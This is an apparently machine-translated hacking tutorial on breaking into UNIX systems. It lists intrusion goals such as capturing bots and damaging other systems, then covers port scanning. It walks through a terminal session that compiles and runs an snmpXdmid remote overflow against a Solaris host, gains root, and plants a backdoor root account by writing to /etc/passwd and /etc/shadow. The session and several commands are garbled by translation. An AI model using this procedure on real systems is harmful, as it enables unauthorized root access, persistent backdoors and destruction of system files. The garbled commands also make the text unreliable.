I. Basic Knowledge
1: Common UNIX versions:
Sco unix, Sunos, Solaris, HP-UX, Digtal, Unix, IRIX, AIX, Linux, FreeBSD, javasbsd, A/UX, BSD, BSD-LITE, Goherent, Dynix, Hurd (GNN ), inTeractive, Mach, Minix, Mks Toolkit, NetNSD, OSF/I, System V Unix, Unicos, Unix ware...
2: a few simple introductions
Sunos & solaris SUN originally wanted to replace sunos with solaris. However, at the user's requirement, the policy of coexistence of the two has been maintained so far;
Freebsd is one of the successors of the famous BSD-UNIX. It is quite stable among many UNIX branches, and many ISPs use Freebsd;
Linux is a free and cheap UNIX product for PC users (its hardware platform is Intel series CPU). In fact, many network administrators actually use Linux.
3: UNIX operating system features
(1) multi-user and multi-task; (2) portability; (3) tree-line file system; (4) I/O redirection and pipeline technology; (5) rich utilities; (6) each user has an email.
4: Highlights
(1) high stability and reliability; (2) strong network functions; (3) good development; (4) Powerful database support functions; and (5) high scalability.
Ii. Purpose of intrusion
1: Learn UNIX, be familiar with internal operations, and complete configuration...
2: as a stepping stone or to capture more UNIX bots;
3: unauthorized access to something that is not available under normal requests;
4: attack or use this tool to damage other systems;
5: more ......
Iii. intrusion methods
1: Find the target
Tool: supperscan, streamer, LANguard Network protocol 2.0, or others, depending on your preferences
Supperscan: Scan port. Note that the host contains %, #, &.... These are UNIX;
LANguard... with simple settings, you can start to judge that the operating system functions of the other party are excellent and accurate in similar software;
Traffic: use advanced scanning, select telnet, PRC, POP3, FTP, and Finger.
The same is true for other methods...
(Note: Many administrators intentionally change the information displayed during telnet login to confuse intruders)
2: Start intrusion
(1) Overflow (all UNIX overflow needs to be compiled in a UNIX/Linux environment)
A: Remote Overflow
Overflow? Too many! Let's just talk about it: freebsd remote overflow, bind Remote Overflow, Sun Solaris 5.7/5.8 remote overflow, and redhat6.xrpc status remote overflow... let's take a look at them one by one. Here I will give two simple examples:
A1: considering a lot of friends use windows, so you can see my brother --- the blue knight masterpiece "freebsd overflow full text version" (Address: http://www.itser.com/ez/.bbs/topic.cgi? Forum = 7 & topic = 25 & show =), because this overflow program has been compiled and can be used directly in windows;
A2: Remote Overflow of Sun Solaris 5.7
Search... finally let me find a sunos 5.7 and a sunos 5.8
Telnet 66. *. 146.48 -----> This is mine!
Sunoperating 5.8
Login: ply
Password:
Last login: Tue Apr 23 03:55:09 from 39448. ddn. xaonli
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
$ Tmp/. sh -----> handle overflow at that time!
# Ls
Bin data etc initrd mnt proc sbin usr
Boot dev home lib misc opt root tmp var
Xfn skip
# Cat> snmp. c
... -----> Too long, omitted... find it by yourself!
# Gcc-o snmp. c -----> compile with gcc
Snmp. c: In function 'main ':
Snmp. c: 181: warning: passing arg 3 of pointer to function from incompatible pointer type
Snmp. c: 181: warning: passing arg 4 of pointer to function from incompatible pointer type
Snmp. c: 181: warning: passing arg 5 of pointer to function from incompatible pointer type
# Ls
Bin data etc initrd mnt proc sbin snmp usr
Boot dev home lib misc opt root snmp. c tmp var
#./Snmp
Copyright last stage of delirium mar 2001 poland // lsd-pl.net/
SnmpXdmid for solaris 2.7 2.8
Usage:./s address [-p port]-v 7 | 8
#./Snmp 216. *. 45.63-v 7 ----> Start overflow !!
DELIRIUM mar 2001 poland // lsd-pl.net/
SnmpXdmid for solaris 2.7 2.8
Adr = 0x000c8f68 timeout = 30 port = 928 connected!
Sent!
SunOS app1-stg-bk-sh 5.7 Generic_106541-09 sun4u iSCSI SUNW, Ultra-80
Id
Uid = 0 (root) gid = 0 (root) -----> is root!
Echo "ply: 0: 0: // bin/bash">/etc/passwd -----> Add a user first!
Echo "ply ::::::::::" >>>/etc/shadow
... -----> Continue if you want to do anything else!